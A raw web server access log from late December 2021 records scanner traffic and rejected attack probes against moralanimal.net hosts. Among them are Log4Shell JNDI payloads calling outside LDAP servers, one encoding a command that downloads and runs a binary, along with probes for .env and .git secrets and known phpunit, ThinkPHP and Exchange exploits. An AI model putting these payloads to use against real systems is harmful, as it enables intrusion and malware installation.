- GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:22:21:56 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:22:42:34 +0000] 444 - GET https newmail.moralanimal.net "/" [Client 34.77.162.2] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [23/Dec/2021:22:57:57 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:22:57:57 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:22:59:34 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:22:59:35 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:23:51:11 +0000] 444 - GET https owa.moralanimal.net "/" [Client 34.96.130.23] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Dec/2021:00:00:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.33.96.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Dec/2021:00:12:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 188.166.165.127] [Length 0] [Gzip -] "-" "-" [24/Dec/2021:00:12:30 +0000] 400 - - http localhost "-" [Client 188.166.165.127] [Length 154] [Gzip -] "-" "-" [24/Dec/2021:00:12:33 +0000] 400 - - http localhost "-" [Client 188.166.165.127] [Length 154] [Gzip -] "-" "-" [24/Dec/2021:00:12:36 +0000] 400 - - http localhost "-" [Client 188.166.165.127] [Length 154] [Gzip -] "-" "-" [24/Dec/2021:00:12:50 +0000] 400 - - https localhost "-" [Client 188.166.165.127] [Length 0] [Gzip -] "-" "-" [24/Dec/2021:00:12:57 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 188.166.165.127] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [24/Dec/2021:00:13:00 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 188.166.165.127] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [24/Dec/2021:00:13:04 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 188.166.165.127] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [24/Dec/2021:00:41:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Dec/2021:01:27:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.59] [Length 0] [Gzip -] "-" "-" [24/Dec/2021:01:27:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.115] [Length 0] [Gzip -] "-" "-" [24/Dec/2021:01:27:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.59] [Length 252] [Gzip -] "-" "-" [24/Dec/2021:01:27:22 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.115] [Length 252] [Gzip -] "-" "-" [24/Dec/2021:01:44:02 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:01:44:03 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:02:01:36 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Dec/2021:03:39:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Dec/2021:04:43:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 223.71.167.165] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [24/Dec/2021:04:43:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 223.71.167.165] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [24/Dec/2021:04:57:31 +0000] 444 - GET https komga.moralanimal.net "/" [Client 34.86.35.4] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Dec/2021:05:10:43 +0000] 444 - GET https antispam.moralanimal.net "/" [Client 34.77.162.25] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Dec/2021:05:30:08 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [24/Dec/2021:05:33:26 +0000] 444 - GET https mx4.moralanimal.net "/" [Client 34.77.162.23] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Dec/2021:06:04:47 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 198.199.106.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Dec/2021:06:04:50 +0000] 444 - GET https 64.22.31.253 "/${jndi:ldap://121.140.99.236:1389/Exploit}" [Client 185.184.152.140] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [24/Dec/2021:06:04:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.184.152.140] [Length 0] [Gzip -] "${jndi:ldap://121.140.99.236:1389/Exploit}" "-" [24/Dec/2021:06:04:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.184.152.140] [Length 0] [Gzip -] "curl/7.58.0" "-" [24/Dec/2021:06:16:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [24/Dec/2021:06:25:54 +0000] 444 - GET https mx1.moralanimal.net "/" [Client 34.77.162.27] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [24/Dec/2021:06:35:59 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:06:36:00 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:06:59:43 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:06:59:43 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:07:04:58 +0000] 444 - GET https mx.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [24/Dec/2021:07:17:05 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Dec/2021:08:05:59 +0000] 400 - - http localhost "-" [Client 156.146.50.142] [Length 154] [Gzip -] "-" "-" [24/Dec/2021:08:13:49 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.197.36] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Dec/2021:08:24:57 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.212.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Dec/2021:08:44:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 111.59.85.209] [Length 0] [Gzip -] "curl/7.58.0" "-" [24/Dec/2021:08:44:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 111.59.85.209] [Length 0] [Gzip -] "curl/7.58.0" "-" [24/Dec/2021:08:44:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 111.59.85.209] [Length 0] [Gzip -] "curl/7.58.0" "-" [24/Dec/2021:08:44:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 111.59.85.209] [Length 0] [Gzip -] "curl/7.58.0" "-" [24/Dec/2021:09:21:16 +0000] 444 - GET https mx02.moralanimal.net "/" [Client 34.86.35.22] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Dec/2021:09:39:33 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:09:39:33 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:09:50:54 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Dec/2021:10:38:03 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [24/Dec/2021:10:48:56 +0000] 444 - GET https srv.moralanimal.net "/" [Client 34.77.162.30] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Dec/2021:11:16:10 +0000] 444 - GET https ns2.moralanimal.net "/" [Client 34.77.162.13] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Dec/2021:11:34:48 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Dec/2021:12:01:21 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Dec/2021:12:01:21 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Dec/2021:12:15:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.173.35.33] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [24/Dec/2021:12:32:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.0.214.160] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Dec/2021:12:56:33 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:12:56:33 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:12:58:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.79] [Length 0] [Gzip -] "-" "-" [24/Dec/2021:13:06:48 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:13:06:48 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:13:18:34 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:13:18:35 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Dec/2021:13:18:59 +0000] 400 - - http localhost "-" [Client 77.83.36.32] [Length 154] [Gzip -] "-" "-" [24/Dec/2021:13:27:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.70] [Length 0] [Gzip -] "-" "-" [24/Dec/2021:13:28:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.106] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Dec/2021:13:29:11 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Dec/2021:13:44:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Dec/2021:14:06:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Dec/2021:14:11:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.136.78] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [24/Dec/2021:14:11:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 128.14.136.78] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [24/Dec/2021:14:54:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [24/Dec/2021:16:10:10 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.120] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Dec/2021:16:12:23 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.95.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Dec/2021:16:15:12 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Dec/2021:16:30:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Dec/2021:16:40:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [24/Dec/2021:16:40:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [24/Dec/2021:16:40:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [24/Dec/2021:16:51:07 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [24/Dec/2021:17:31:45 +0000] 444 - GET https mx1.moralanimal.net "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [24/Dec/2021:18:19:37 +0000] 444 - GET https ms1.moralanimal.net "/" [Client 34.86.35.11] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Dec/2021:19:29:27 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [24/Dec/2021:19:29:28 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [24/Dec/2021:19:47:12 +0000] 444 - GET https zmail.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [24/Dec/2021:20:45:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Dec/2021:22:21:01 +0000] 400 - GET http 64.22.31.253 "/" [Client 18.221.182.245] [Length 252] [Gzip -] "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//135.148.130.60:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTguMjIyLjEyMi4yMjEvcmVhZGVyOyBjdXJsIC1PIGh0dHA6Ly8xOC4yMjIuMTIyLjIyMS9yZWFkZXI7IGNobW9kIDc3NyByZWFkZXI7IC4vcmVhZGVyIHJ1bm5lcg==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//135.148.130.60:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTguMjIyLjEyMi4yMjEvcmVhZGVyOyBjdXJsIC1PIGh0dHA6Ly8xOC4yMjIuMTIyLjIyMS9yZWFkZXI7IGNobW9kIDc3NyByZWFkZXI7IC4vcmVhZGVyIHJ1bm5lcg==}')" [24/Dec/2021:22:22:20 +0000] 444 - GET https mailrelay.moralanimal.net "/" [Client 34.86.35.3] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [24/Dec/2021:22:39:37 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [25/Dec/2021:00:46:45 +0000] 444 - GET https localhost "/" [Client 43.130.57.239] [Length 0] [Gzip -] "curl/7.64.1" "-" [25/Dec/2021:00:46:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 205.185.116.25] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [25/Dec/2021:00:55:31 +0000] 400 - GET http 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [25/Dec/2021:00:55:32 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [25/Dec/2021:01:06:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 172.105.161.246] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Dec/2021:01:10:07 +0000] 444 - GET https mail8.moralanimal.net "/" [Client 34.96.130.30] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [25/Dec/2021:01:15:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Dec/2021:01:21:50 +0000] 444 - GET https outlook.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [25/Dec/2021:01:25:42 +0000] 444 - GET https mta1.moralanimal.net "/" [Client 34.96.130.4] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [25/Dec/2021:01:26:31 +0000] 444 - GET https mailrelay.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [25/Dec/2021:01:50:08 +0000] 444 - GET https mail2.moralanimal.net "/" [Client 34.77.162.20] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [25/Dec/2021:01:56:42 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.77.162.12] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [25/Dec/2021:02:01:58 +0000] 444 - GET https agent.moralanimal.net "/" [Client 34.86.35.10] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [25/Dec/2021:03:24:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.67] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:03:32:57 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Dec/2021:04:50:30 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Dec/2021:05:03:44 +0000] 444 - GET https ms1.moralanimal.net "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [25/Dec/2021:05:34:49 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Dec/2021:06:25:31 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.64] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Dec/2021:07:01:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.114] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:07:01:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "-" "-" [25/Dec/2021:07:01:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [25/Dec/2021:07:35:00 +0000] 444 - GET https 64.22.31.253 "/${jndi:ldap://121.140.99.236:1389/Exploit}" [Client 178.176.202.121] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [25/Dec/2021:07:35:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.176.202.121] [Length 0] [Gzip -] "curl/7.58.0" "-" [25/Dec/2021:07:35:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.176.202.121] [Length 0] [Gzip -] "${jndi:ldap://121.140.99.236:1389/Exploit}" "-" [25/Dec/2021:07:53:45 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Dec/2021:08:10:53 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.83] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Dec/2021:08:26:16 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.134] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Dec/2021:08:28:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.220.101.176] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" [25/Dec/2021:08:28:30 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.101.129] [Length 0] [Gzip -] "-" "-" [25/Dec/2021:08:28:31 +0000] 444 - GET https localhost 